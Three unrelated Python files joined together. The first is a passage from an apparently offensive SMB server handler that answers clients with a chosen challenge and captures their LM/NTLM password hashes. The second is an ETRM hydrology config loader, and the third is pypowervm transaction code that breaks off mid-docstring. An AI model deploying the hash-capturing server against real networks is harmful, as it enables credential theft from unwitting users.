Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x74\x00" and data[4:5] == "\xff": # LogOff
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
class SMB1LM(BaseRequestHandler): # SMB Server class, old version
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
Challenge = RandomChallenge()
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x72\x00": #Negotiate proto answer.
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge)
Body.calculate()
Packet = str(head)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x73\x00": #Session Setup AndX Request
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
ParseLMNTHash(data,self.client_address[0], Challenge)
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head) + str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except Exception:
self.request.close()
pass
|
|
# ===============================================================================
# Copyright 2017 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
# ============= local library imports ==========================
import os
import sys
from datetime import datetime
import yaml
from app.paths import paths
from recharge import STATIC_KEYS, INITIAL_KEYS
DEFAULT_CFG = '''
---
input_root: Please Set Me ## /Volumes/Seagate Expansion Drive/ETRM_input
output_root: Please Set Me ## /Users/ross/Desktop
# === START (No earlier than year 2000) ===
start_day: SET ME # dd
start_month: SET ME # mm
start_year: SET ME # YYYY
# === Finish (No later than year 2013) ===
end_day: SET ME #dd
end_month: SET ME # mm
end_year: SET ME # YYYY
# === MASKS ===
mask: SET ME # mask of study area (e.g. Mask/my_mask.tif)
binary_shapefile: SET ME # Set path to raster for individual tracker output (e.g. binary_shapefile/my_b_shp.tif)
polygons: Blank_Geo # (default)
tiff_shape: None
# === Saving specific dates as rasters ===
save_dates: [] # list in format -> 'mm/dd/YYYY' such as ['mm/dd/YYYY', 'mm/dd/YYYY', 'mm/dd/YYYY']
write_freq: SET ME # modify to output monthly or yearly rasters. OPTIONS -> daily|monthly|yearly
daily_outputs: [dr, de, drew] # OPTIONS -> anything that appears in the tracker
# ==== To track change between two consecutive time periods ===
use_period_change: False # Set to True to enable
# === Settings that handle the stochastic rainfall runoff method
seed: 123456789 # A default seed so the stochastic behaviour of the model can be replicated
use_walnut_gulch_ro: True # Uses Esther Xu (Xu Thesis 2018) stochastic runoff method based on the Walnut Gulch watershed.
# Otherwise RO is computed linearly from Amy Lewis data
use_monsoon_precip_correction: True # Uses the Xu correction to PRISM based on Walnut Gulch watershed precip vs PRISM
use_mountain_precip_correction: False # Corrects precip based on Amy Lewis
# === Misc settings ===
is_reduced: False # (default)
winter_evap_limiter: 0.3 # (default)
polygons: Blank_Geo # (default)
evap_ceff: 1.0 # (default)
ro_reinf_frac: 0.0 # (default) Runoff Reinfiltration Fraction. To increase runoff into soil.
rew_ceff: 1.0 # (default)
output_units: mm # (default) OPTIONS -> mm|acre-ft|?
winter_end_day: 92 # (default)
winter_start_day: 306 # (default)
use_individual_kcb: True # (default)
new_mexico_extent: True
# === Don't Change ===
swb_mode: fao # FAO 56 Water Balance Method
use_verify_paths: True
# === individual pixel tracker related ===
plot_output: SET ME # (for plots of the binary shapefile pixel tracker time series)
xplot: ['Date'] # (default)
yplot: ['rain', 'eta', 'rzsm'] # (default) OPTIONS -> anything in master dict.
# # === TAW parametrization (default is commented out) ====
# taw_modification: 1.0 # (default) Will increase TAW by a specified factor.
# uniform_taw: 25 # changes entire raster to a given TAW value
'''
DATETIME_FMT = '%m/%d/%Y'
class RunSpec:
_obj = None
nlcd_name = None
dem_name = None
aspect_name = None
slope_name = None
x_cord_name = None
y_cord_name = None
mask = None
polygons = None
input_root = None
output_root = None
output_path = None
write_freq = None
use_verify_paths = None
uniform_taw = None
taw_modification = 1.0
ro_reinf_frac = 0.0
swb_mode = 'fao'
rew_ceff = 1.0
evap_ceff = 1.0
winter_evap_limiter = 0.3
winter_end_day = 92
winter_start_day = 306
output_units = 'acre-ft'
is_reduced = False
binary_shapefile = None # TODO point_tracker
new_mexico_extent = False
xplot = None
yplot = None
plot_output = None
tiff_shape = None
use_walnut_gulch_ro = True
seed = 123456789
use_monsoon_precip_correction = True
use_mountain_precip_correction = False
pvalue = None
def __init__(self, obj):
self._obj = obj
attrs = ('mask', 'polygons', 'use_individual_kcb',
'input_root', 'output_root', 'write_freq', 'use_verify_paths',
'nlcd_name', 'dem_name', 'aspect_name', 'slope_name',
'taw_modification',
'ro_reinf_frac', 'swb_mode', 'rew_ceff', 'evap_ceff',
'winter_evap_limiter', 'winter_end_day', 'winter_start_day',
'output_units', 'is_reduced', 'uniform_taw', 'binary_shapefile', 'new_mexico_extent',
'tiff_shape',
'xplot', 'yplot', 'plot_output',
'use_walnut_gulch_ro',
'seed',
'use_monsoon_precip_correction',
'use_mountain_precip_correction',
'pvalue') # GELP removed 'output_path', 'x_cord_name','y_cord_name', 5/4/2017
# print 'the attributes', attrs
for attr in attrs:
# print "last attr out", attr
setattr(self, attr, self._obj.get(attr))
initial = self._obj.get('initial')
if initial:
for attr in INITIAL_KEYS:
setattr(self, attr, initial.get(attr))
static = self._obj.get('static')
if static:
for attr in STATIC_KEYS:
setattr(self, attr, static.get(attr))
@property
def initial_pairs(self):
try:
return tuple((k, getattr(self, k)) for k in INITIAL_KEYS)
except AttributeError:
pass
@property
def static_pairs(self):
try:
return tuple((k, getattr(self, k)) for k in STATIC_KEYS)
except AttributeError:
pass
@property
def save_dates(self):
sd = self._obj.get('save_dates')
if sd:
return [datetime.strptime(s, DATETIME_FMT) for s in sd]
@property
def date_range(self):
obj = self._obj
if 'start_year' in obj:
return (datetime(obj['start_year'],
obj['start_month'],
obj['start_day']),
datetime(obj['end_year'],
obj['end_month'],
obj['end_day']))
else:
return (datetime.strptime(obj['start_date'], DATETIME_FMT),
datetime.strptime(obj['end_date'], DATETIME_FMT))
@property
def daily_outputs(self):
return self._obj.get('daily_outputs', [])
class Config:
runspecs = None
path = None
def __init__(self, path=None):
self.load(path=path)
def load(self, path=None):
if path is None:
path = paths.config
if isinstance(path, (str, unicode)):
check_config(path)
rfile = open(path, 'r')
else:
rfile = path
# print paths.config
# print rfile
# rfile = path
# for doc in yaml.load_all(rfile):
# if doc != None:
# print doc
# else:
# print "here's the bad one"
# print doc
self.runspecs = [RunSpec(doc) for doc in yaml.load_all(rfile)]
print "runspecs", self.runspecs
rfile.close()
self.path = path
# self.runspecs = [RunSpec(i, doc) for i, doc in enumerate(yaml.load_all(rfile))]
# rfile.close()
def check_config(path=None):
if path is None:
path = paths.config
if not os.path.isfile(path):
print '***** The config file {} does not exist. A default one will be written'.format(path)
with open(path, 'w') as wfile:
print '-------------- DEFAULT CONFIG -----------------'
print DEFAULT_CFG
print '-----------------------------------------------'
wfile.write(DEFAULT_CFG)
print '***** Please edit the config file at {} and rerun the model'.format(path)
sys.exit()
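# Illustrative usage sketch (not part of the original module; the path below
# is a placeholder): loading run specifications from a config file written in
# the DEFAULT_CFG format above.
#
#   cfg = Config('/path/to/etrm_config.yml')
#   for spec in cfg.runspecs:
#       start, end = spec.date_range
#       print 'run', spec.input_root, start, end, spec.daily_outputs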
# ============= EOF =============================================
|
|
# Copyright 2015, 2017 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from concurrent.futures import thread as th
import oslo_concurrency.lockutils as lock
import oslo_context.context as ctx
from oslo_log import log as logging
from oslo_utils import reflection
import six
from taskflow import engines as tf_eng
from taskflow import exceptions as tf_ex
from taskflow.patterns import linear_flow as tf_lf
from taskflow.patterns import unordered_flow as tf_uf
from taskflow import task as tf_task
import threading
import pypowervm.exceptions as ex
from pypowervm.i18n import _
from pypowervm.utils import retry
import pypowervm.wrappers.entry_wrapper as ewrap
LOG = logging.getLogger(__name__)
_local = threading.local()
def _get_locks():
"""Returns the list of UUIDs locked by this thread."""
locks = getattr(_local, 'entry_transaction', None)
if locks is None:
locks = []
_set_locks(locks)
return locks
def _set_locks(locks):
"""Sets the list of UUIDs locked by this thread."""
_local.entry_transaction = locks
def entry_transaction(func):
"""Decorator to facilitate transaction semantics on a PowerVM object.
Typically, a method thus decorated will make some set of changes to an
EntryWrapper and then perform one or more REST operations thereon.
The *consumer* of the decorated method may pass either an EntryWrapper or
an EntryWrapperGetter as the first argument. The *developer* of the
decorated method is guaranteed that the first argument is an EntryWrapper.
This decorator provides three things:
1) The decorated method may be invoked with either an EntryWrapper or an
EntryWrapperGetter as its first argument. However, within the body of the
method, that argument is guaranteed to be the appropriate EntryWrapper.
2) The decorated method is locked on the UUID of the PowerVM object on
which it operates (represented by its first argument). Only one method
thus decorated can operate on that PowerVM object at one time.
3) If the decorated method fails due to an etag mismatch - indicating that
the wrapper was updated out-of-band between when it was retrieved and when
it was updated - the wrapper is refreshed and the entire method is
redriven.
Note: If the etag mismatch occurs, the STEPPED_DELAY function is used
from the retry.py. This provides a gradual increase in the delay (except
for the first retry - which is immediate). A maximum number of 6 retries
will occur.
Example usage:
@entry_transaction
def add_gizmos_to_vios_wrapper(vios_wrapper, gizmos):
vios_wrapper.gizmo_list.extend(gizmos)
return vios_wrapper.update()
This method can then be invoked either as:
add_gizmos_to_vios_wrapper(existing_vios_wrapper, gizmos)
or as:
add_gizmos_to_vios_wrapper(pvm_vios.VIOS.getter(adapter, uuid), gizmos)
"""
def _synchronize(wrp_or_spec, *a1, **k1):
"""Returned method is synchronized on the object's UUID."""
@lock.synchronized(wrp_or_spec.uuid)
def _locked_resolve_wrapper(wos, *a2, **k2):
try:
# The synchronized decorator will hold off other threads;
# we just have to hold off lock attempts by methods further
# down the stack.
_get_locks().append(wrp_or_spec.uuid)
return _resolve_wrapper(wos, *a2, **k2)
finally:
_get_locks().remove(wrp_or_spec.uuid)
def _resolve_wrapper(wos, *a2, **k2):
"""Returned method guaranteed to be called with a wrapper."""
if isinstance(wos, ewrap.EntryWrapperGetter):
wos = wos.get()
@retry.retry(argmod_func=retry.refresh_wrapper, tries=60,
delay_func=retry.STEPPED_RANDOM_DELAY)
def _retry_refresh(wrapper, *a3, **k3):
"""Retry as needed, refreshing its wrapper each time."""
return func(wrapper, *a3, **k3)
return _retry_refresh(wos, *a2, **k2)
def _lock_if_needed(wos, *a2, **k2):
# Check if this UUID is already locked
if wrp_or_spec.uuid in _get_locks():
# It's already locked by this thread, so skip the lock.
return _resolve_wrapper(wos, *a2, **k2)
else:
return _locked_resolve_wrapper(wos, *a2, **k2)
return _lock_if_needed(wrp_or_spec, *a1, **k1)
return _synchronize
@six.add_metaclass(abc.ABCMeta)
class Subtask(object):
"""A single EntryWrapper modification to be performed within a WrapperTask.
A subclass performs its work by overriding the execute method. That method
may or may not make changes to the EntryWrapper, which is its first
argument. Its return value must indicate whether changes were made to the
wrapper: this is the trigger used by WrapperTask to determine whether to
POST the changes back to the REST server via update(). The return value is
saved by the surrounding WrapperTask if the 'provides' argument is used on
initialization. This value can then be retrieved by subsequent Subtasks.
A Subtask should never update() or refresh() the wrapper. That is handled
by the surrounding WrapperTask.
See WrapperTask for example usage.
"""
def __init__(self, *save_args, **save_kwargs):
"""Create the Subtask, saving execution arguments for later.
:param save_args: Positional arguments to be passed to the execute
method - *after* the wrapper - when it is invoked
under a WrapperTask.
:param save_kwargs: Keyword arguments to be passed to the execute
method when it is invoked under a WrapperTask.
:param provides: (Optional) String name for the return value from the
execute method. If this parameter is used, the return
value will be saved by the surrounding WrapperTask and
be available to subsequent Subtasks via the 'provided'
keyword argument. The 'provides' name must be unique
within a WrapperTask.
:param flag_update: (Optional) Boolean indicating whether a True return
from this Subtask should trigger an update() in the
surrounding WrapperTask. By default, this is True.
Set this to False, for example, to provide some
data to subsequent Subtasks without forcing an
update.
"""
self.provides = save_kwargs.pop('provides', None)
self.flag_update = save_kwargs.pop('flag_update', True)
self.save_args = save_args
self.save_kwargs = save_kwargs
@abc.abstractmethod
def execute(self, *args, **kwargs):
"""Modify the EntryWrapper (must be overridden by the subclass).
The execute method has two responsibilities:
1) Performs the modification to the EntryWrapper which is passed as its
first argument.
2) Indicates whether any modifications were performed.
Example:
def execute(thingy_wrapper, primary_widget, provided=None):
update_needed = False
if primary_widget not in thingy_wrapper.widgets:
thingy_wrapper.set_primary_widget(primary_widget)
update_needed = True
# Was a widget list provided by a prior Subtask?
if provided is not None:
widget_list = provided.get('widget_list', [])
for widget in widget_list:
thingy_wrapper.widgets.append(widget)
update_needed = True
return update_needed
:param args: Positional arguments accepted by the execute method. The
first argument will always be the EntryWrapper. Overrides
may define their signatures using explicit parameter
names.
:param kwargs: Keyword arguments accepted by the execute method.
Overrides may use explicit parameter names.
:param provided: Dict of return values provided by Subtasks whose
execution preceded this one, and which used the
'provides' keyword argument to save their returns.
The keys of the dict are the 'provides' strings of the
prior Subtasks.
:return: The return value must be a single value (this may be a list,
but not a tuple) which evaluates to True or False. Unless
this Subtask was initialized with flag_update=False, any True
value indicates that the wrapper was modified and should be
POSTed back to the REST server via update(). Any False value
(including None, [], {}, etc) indicates that this Subtask did
not modify the wrapper. (Note that it may still be POSTed if
modified by other Subtasks in the same WrapperTask.)
"""
class _FunctorSubtask(Subtask):
"""Shim to create a Subtask around an existing callable."""
def __init__(self, _func, *save_args, **save_kwargs):
"""Save the callable as well as the arguments.
:param _func: Callable to be invoked under the WrapperTask.
:param save_args: See Subtask.__init__(save_args).
:param save_kwargs: See Subtask.__init__(save_kwargs). May contain the
following values, which are treated specially and
NOT passed to the callable _func:
provides: See Subtask.__init__(provides).
flag_update: See Subtask.__init__(flag_update).
logspec: Iterable comprising a logging function, a format
string, and zero or more arguments. The log method is
invoked before the func. Example:
logspec = [LOG.info, _LI("Deleting widget %(widget)s from "
"instance %(instance)s."),
{'widget': widg, 'instance': instance.name}]
FunctorSubtask(..., logspec=logspec)
"""
self._logspec = save_kwargs.pop('logspec', [])
super(_FunctorSubtask, self).__init__(*save_args, **save_kwargs)
self._func = _func
if self._logspec:
if len(self._logspec) < 2 or not callable(self._logspec[0]):
raise ValueError(
"logspec must be a list comprising a callable followed by "
"a format string and zero or more arguments.")
def execute(self, wrapper, *_args, **_kwargs):
"""Invoke saved callable with saved args."""
if not ('provided' in reflection.get_callable_args(self._func)
or reflection.accepts_kwargs(self._func)):
_kwargs.pop('provided', None)
if self._logspec:
# Execute the log method (the first element in the list) with its
# arguments (the remaining elements in the list).
self._logspec[0](*self._logspec[1:])
return self._func(wrapper, *_args, **_kwargs)
class WrapperTask(tf_task.Task):
"""An atomic modify-and-POST transaction Task over a single EntryWrapper.
The modifications should comprise some number of Subtask instances, added
to this WrapperTask via the add_subtask and/or add_functor_subtask methods.
These Subtasks should only modify the EntryWrapper, and should not POST
(.update()) it back to the REST Server. The WrapperTask will decide
whether a POST is needed based on the returns from the Subtasks' execute
methods, and perform it if indicated.
The WrapperTask's execute method is encompassed by @entry_transaction,
meaning that:
1) The initial GET of the EntryWrapper may be deferred until after the lock
is acquired.
2) The execute method is locked on the UUID of the Entry in question.
3) If the final update (POST) fails due to etag mismatch, the EntryWrapper
is refetched and the entire transaction is redriven from the start.
Usage:
class ModifyGizmos(Subtask):
def execute(self, wrapper, gizmo_list, provides='first_gizmo'):
update_needed = None
if gizmo_list:
wrapper.gizmos.append(gizmo_list)
update_needed = gizmo_list[0]
return update_needed
def add_widget(wrapper, widget, frob=False, provided=None):
if provided is not None:
widget.first_gizmo = provided.get('first_gizmo')
wrapper.widgets.append(widget, frob)
return len(wrapper.widgets)
...
tx = WrapperTask("do_lpar_things", LPAR.getter(adapter, lpar_uuid))
or
tx = WrapperTask("do_lpar_things", LPAR.getter(adapter, lpar_uuid),
subtasks=existing_wrapper_task.subtasks)
or
# Not recommended - increased probability of retry
wrapper = LPAR.wrap(adapter.read(LPAR.schema_type, lpar_uuid))
tx = WrapperTask("do_lpar_things", wrapper)
...
tx.add_subtask(ModifyGizmos([giz1, giz2]))
...
logspec = [LOG.info, _LI("Added widget %(widget)s to LPAR %(lpar)s."),
{'widget': widget.name, 'lpar': lpar_uuid}]
tx.add_functor_subtask(add_widget, widget, provides='widget_count',
logspec=logspec)
...
finalized_lpar = tx.execute()
"""
def __init__(self, name, wrapper_or_getter, subtasks=None,
allow_empty=False, update_timeout=-1):
"""Initialize this WrapperTask.
:param name: A descriptive string name for the WrapperTask.
:param wrapper_or_getter: An EntryWrapper or EntryWrapperGetter
representing the PowerVM object on which this
WrapperTask is to be performed.
:param subtasks: (Optional) Iterable of Subtask subclass instances with
which to seed this WrapperTask.
:param allow_empty: (Optional) By default, executing a WrapperTask
containing no Subtasks will result in exception
WrapperTaskNoSubtasks. If this flag is set to
True, this condition will instead log an info
message and return None (NOT the wrapper - note,
this is different from "subtasks ran, but didn't
change anything," which returns the wrapper).
:param update_timeout: (Optional) Integer number of seconds after which
to time out the POST request. -1, the default,
causes the request to use the timeout value
configured on the Session belonging to the
Adapter.
:raise WrapperTaskNoSubtasks: If allow_empty is False and this
WrapperTask is executed without any
Subtasks having been added.
"""
if isinstance(wrapper_or_getter, ewrap.EntryWrapperGetter):
self._wrapper = None
self._getter = wrapper_or_getter
elif isinstance(wrapper_or_getter, ewrap.EntryWrapper):
self._wrapper = wrapper_or_getter
self._getter = None
else:
raise ValueError(_("Must supply either EntryWrapper or "
"EntryWrapperGetter."))
super(WrapperTask, self).__init__(
name, provides=('wrapper_%s' % wrapper_or_getter.uuid,
'subtask_rets_%s' % wrapper_or_getter.uuid))
self._tasks = [] if subtasks is None else list(subtasks)
self.allow_empty = allow_empty
self.update_timeout = update_timeout
# Dict of return values provided by Subtasks using the 'provides' arg.
self.provided = {}
# Set of 'provided' names to prevent duplicates. (Some day we may want
# to make this a list and use it to denote the order in which subtasks
# were run.)
self.provided_keys = set()
def add_subtask(self, task):
"""Add a Subtask to this WrapperTask.
Subtasks will be invoked serially and synchronously in the order in
which they are added.
:param task: Instance of a Subtask subclass containing the logic to
invoke.
:return: self, for chaining convenience.
"""
if not isinstance(task, Subtask):
raise ValueError(_("Must supply a valid Subtask."))
# Seed the 'provided' dict and ensure no duplicate names
if task.provides is not None:
if task.provides in self.provided_keys:
raise ValueError(_("Duplicate 'provides' name %s.") %
task.provides)
self.provided_keys.add(task.provides)
self._tasks.append(task)
return self
def add_functor_subtask(self, func, *args, **kwargs):
"""Create and add a Subtask for an already-defined method.
:param func: A callable to be the core of the Subtask. The contract
for this method is identical to that of Subtask.execute -
see that method's docstring for details.
:param args: Positional arguments to be passed to the callable func
(after the EntryWrapper parameter) when it is executed
within the WrapperTask.
:param kwargs: Keyword arguments to be passed to the callable func when
it is executed within the WrapperTask. May contain the
following values, which are treated specially and NOT
passed to the callable func:
provides: See Subtask.__init__(provides).
flag_update: See Subtask.__init__(flag_update).
logspec: Iterable comprising a logging function, a format
string, and zero or more arguments. The log method is
invoked before the func. Example:
logspec = [LOG.info, _LI("Deleting widget %(widget)s from "
"instance %(instance)s."),
{'widget': widg, 'instance': instance.name}]
FunctorSubtask(..., logspec=logspec)
:return: self, for chaining convenience.
"""
return self.add_subtask(_FunctorSubtask(func, *args, **kwargs))
@property
def wrapper(self):
"""(Fetches and) returns the EntryWrapper.
Use this only if you need the EntryWrapper outside of the WrapperTask's
execution itself.
Note that this guarantees a GET outside of lock, and should therefore
be used only if absolutely necessary.
"""
if not self._wrapper:
self._wrapper = self._getter.get()
# NOTE: This access of self._wrapper must remain atomic.
# See TAG_WRAPPER_SYNC.
return self._wrapper
@property
def subtasks(self):
"""Return the sequence of Subtasks registered with this WrapperTask.
This is returned as a tuple (not modifiable). To add subtasks, use the
add_[functor_]subtask method.
"""
return tuple(self._tasks)
def execute(self):
"""Invoke subtasks and update under @entry_transaction.
The flow is as follows:
1 Lock on wrapper UUID
2 GET wrapper if necessary
3 For each registered Subtask:
- Invoke the Subtask to modify the wrapper
4 If update is necessary, POST the wrapper. If POST fails with etag
mismatch:
- Refresh the wrapper
- goto 2
5 Unlock
"""
if len(self._tasks) == 0:
if self.allow_empty:
LOG.info(_("WrapperTask %s has no Subtasks; no-op execution."),
self.name)
return None
raise ex.WrapperTaskNoSubtasks(name=self.name)
@entry_transaction
def _execute(wrapper):
update_needed = False
for task in self._tasks:
kwargs = task.save_kwargs
if ('provided' in reflection.get_callable_args(task.execute)
or reflection.accepts_kwargs(task.execute)):
kwargs['provided'] = self.provided
ret = task.execute(wrapper, *task.save_args, **kwargs)
if task.flag_update and ret:
update_needed = True
if task.provides is not None:
self.provided[task.provides] = ret
if update_needed:
wrapper = wrapper.update(timeout=self.update_timeout)
return wrapper
# Use the wrapper if already fetched, or the getter if not
# NOTE: This assignment must remain atomic. See TAG_WRAPPER_SYNC.
self._wrapper = _execute(self._wrapper or self._getter)
return self._wrapper, self.provided
class ContextThreadPoolExecutor(th.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
context = ctx.get_current()
# Get the list of locks held by this thread, we don't want sub
# tasks locking the same thing!
held_locks = list(_get_locks())
def wrapped():
# This is executed in the new thread.
if context is not None:
context.update_store()
# Ensure the sub task knows about the parent's locks and doesn't
# block on them.
_set_locks(held_locks)
return fn(*args, **kwargs)
return super(ContextThreadPoolExecutor, self).submit(wrapped)
class FeedTask(tf_task.Task):
"""Invokes WrapperTasks in parallel over each EntryWrapper in a feed.
Usage
Creation:
# Preferred
fm = FeedTask('lpar_frobnicate', LPAR.getter(adapter))
or
# Non-preferred. See 'Greedy Methods' warning below
feed = LPAR.wrap(adapter.read(LPAR.schema_type, ...))
fm = FeedTask('lpar_frobnicate', feed)
Adding Subtasks:
# Preferred
fm.add_subtask(FrobnicateLpar(foo, bar))
fm.add_functor_subtask(frobnify, abc, xyz)
and/or
# Non-preferred. See 'Greedy Methods' warning below
for uuid, txn in fm.wrapper_tasks.items():
if meets_criteria(txn.wrapper, uuid):
txn.add_subtask(FrobnicateLpar(baz, blah))
fm.wrapper_tasks[known_uuid].add_subtask(FrobnicateLpar(baz, blah))
Execution/TaskFlow management:
main_flow.add(fm)
...
taskflow.engines.run(main_flow)
Warning: Greedy Methods
This implementation makes every effort to defer the feed GET as long as
possible. The more time passes between the GET and the execution of the
WrapperTasks, the more likely it is that some out-of-band change will have
modified one of the objects represented in the feed. This will cause an
etag mismatch on that WrapperTask's update (POST), resulting in that
WrapperTask being redriven, which costs an extra GET+POST to the REST
server.
Consumers of this class can thwart these efforts by:
a) Initializing the FeedTask with an already-retrieved feed instead of a
FeedGetter; or
b) Using any of the following methods/properties prior to execution. All
of these will trigger a GET of the feed if not already fetched:
.wrapper_tasks
.get_wrapper(uuid)
.feed
The cost is incurred only the first time one of these is used. If your
workflow requires calling one of these early, it is not necessary to
avoid them subsequently.
"""
def __init__(self, name, feed_or_getter, max_workers=10,
update_timeout=-1):
"""Create a FeedTask with a FeedGetter (preferred) or existing feed.
:param name: A descriptive string name. This will be used along with
each wrapper's UUID to generate the name for that
wrapper's WrapperTask.
:param feed_or_getter: pypowervm.wrappers.entry_wrapper.FeedGetter or
an already-fetched feed (list of EntryWrappers)
over which to operate.
:param max_workers: (Optional) Integer indicating the maximum number of
worker threads to run in parallel within the .flow
or by the .execute method. See
concurrent.futures.ThreadPoolExecutor(max_workers).
:param update_timeout: (Optional) Integer number of seconds after which
to time each WrapperTask's POST request. -1,
the default, causes the request to use the
timeout value configured on the Session
belonging to the Adapter.
"""
super(FeedTask, self).__init__(name)
if isinstance(feed_or_getter, ewrap.FeedGetter):
self._feed = None
self._getter = feed_or_getter
elif isinstance(feed_or_getter, list):
# Make sure the feed has something in it.
if len(feed_or_getter) == 0:
raise ex.FeedTaskEmptyFeed()
# Make sure it's a list of EntryWrapper
if [i for i in feed_or_getter
if not isinstance(i, ewrap.EntryWrapper)]:
raise ValueError("List must contain EntryWrappers "
"exclusively.")
self._feed = feed_or_getter
self._getter = None
else:
raise ValueError(_("Must supply either a list of EntryWrappers or "
"a FeedGetter."))
# Max WrapperTasks to run in parallel
self.max_workers = max_workers
self.update_timeout = update_timeout
# Map of {uuid: WrapperTask}. We keep this empty until we need the
# individual WrapperTasks. This is triggered by .wrapper_tasks and
# .get_wrapper(uuid) (and obviously executing).
self._tx_by_uuid = {}
# Until we *need* individual WrapperTasks, save subtasks in one place.
# EntryWrapperGetter is a cheat to allow us to build the WrapperTask.
self._common_tx = WrapperTask(
'internal', ewrap.EntryWrapperGetter(None, ewrap.Wrapper,
None))
self._post_exec = []
@property
def wrapper_tasks(self):
"""(Greedy) Dictionary of {uuid: WrapperTask} for all wrappers.
The first access of this property triggers a GET of the feed if it has
not already been fetched, so use judiciously.
"""
if not self._tx_by_uuid:
# Create a separate WrapperTask for each wrapper in the feed.
# As long as the consumer uses FeedTask.add_[functor_]subtask
# and doesn't ask for .wrapper_tasks, we keep only one copy of the
# subtask list. Once the consumer "breaks the seal" and requests
# individual WrapperTasks per wrapper, we need to (GET the feed -
# this is triggered by .feed - and) create them based on this
# common subtask list.
# This is only done once. Thereafter, .add_[functor_]subtask will
# add separately to each WrapperTask.
for entry in self.feed:
name = '%s_%s' % (self.name, entry.uuid)
self._tx_by_uuid[entry.uuid] = WrapperTask(
name, entry, subtasks=self._common_tx.subtasks,
allow_empty=True, update_timeout=self.update_timeout)
return self._tx_by_uuid
def get_wrapper(self, uuid):
"""(Greedy) Returns the EntryWrapper associated with a particular UUID.
Note that this method triggers a GET of the feed if it has not already
been fetched, so use judiciously.
:param uuid: The UUID of the wrapper of interest.
:return: The EntryWrapper instance with the specified UUID.
:raise KeyError: If there's no WrapperTask for a wrapper with the
specified UUID.
"""
# Grab it from the WrapperTask map (O(1)) rather than the feed (O(n)).
# It'll also be up to date without having to trigger a feed rebuild.
return self.wrapper_tasks[uuid].wrapper
def add_subtask(self, task):
"""Add a Subtask to *all* WrapperTasks in this FeedTask.
To add Subtasks to individual WrapperTasks, iterate over the result of
the 'wrapper_tasks' property.
Specification is the same as for WrapperTask.add_subtask.
"""
if self._tx_by_uuid:
# _tx_by_uuid is guaranteed to have WrapperTasks for all UUIDs,
# including this one
for txn in self._tx_by_uuid.values():
txn.add_subtask(task)
else:
self._common_tx.add_subtask(task)
return self
def add_functor_subtask(self, func, *args, **kwargs):
"""Add a functor Subtask to *all* WrapperTasks in this FeedTask.
To add Subtasks to individual WrapperTasks, iterate over the result of
the 'wrapper_tasks' property.
Specification is the same as for WrapperTask.add_functor_subtask.
"""
return self.add_subtask(_FunctorSubtask(func, *args, **kwargs))
def add_post_execute(self, *tasks):
"""Add some number of TaskFlow Tasks to run after the WrapperTasks.
Such Tasks may 'require' a parameter called wrapper_task_rets, which
will be a dict of the form:
{uuid: {
'wrapper': wrapper,
label1: return_value,
label2: return_value,
...
labelN: return_value}}
...where:
uuid is the UUID of the WrapperTask's wrapper.
wrapper is the WrapperTask's wrapper in its final (possibly-updated)
form.
labelN: return_value are the return values from Subtasks using the
'provides' mechanism. Each label corresponds to the name
given by the Subtask's 'provides' argument.
:param tasks: Some number of TaskFlow Tasks (or Flows) to be executed
linearly after the parallel WrapperTasks have completed.
"""
self._post_exec.extend(tasks)
@property
def feed(self):
"""(Greedy) Returns this FeedTask's feed (list of wrappers).
The first access of this property triggers a GET of the feed if it has
not already been fetched, so use this only if you need the
EntryWrappers outside of the execution itself.
"""
if self._feed is None:
self._feed = self._getter.get()
if len(self._feed) == 0:
raise ex.FeedTaskEmptyFeed()
# Do we need to refresh the feed based on having been run?
# If we haven't replicated WrapperTasks yet, there's no chance we're
# out of sync - and we don't want to trigger GET/replication.
if self._tx_by_uuid:
# Rebuild the entire feed from the WrapperTasks' .wrappers.
# TAG_WRAPPER_SYNC
# Note that, if this happens while the WrapperTasks are running,
# we may be grabbing the wrapper from a WrapperTask "while" it is
# being changed as the result of an update(). This is threadsafe as
# long as the assignment (by WrapperTask.execute) and the accessor
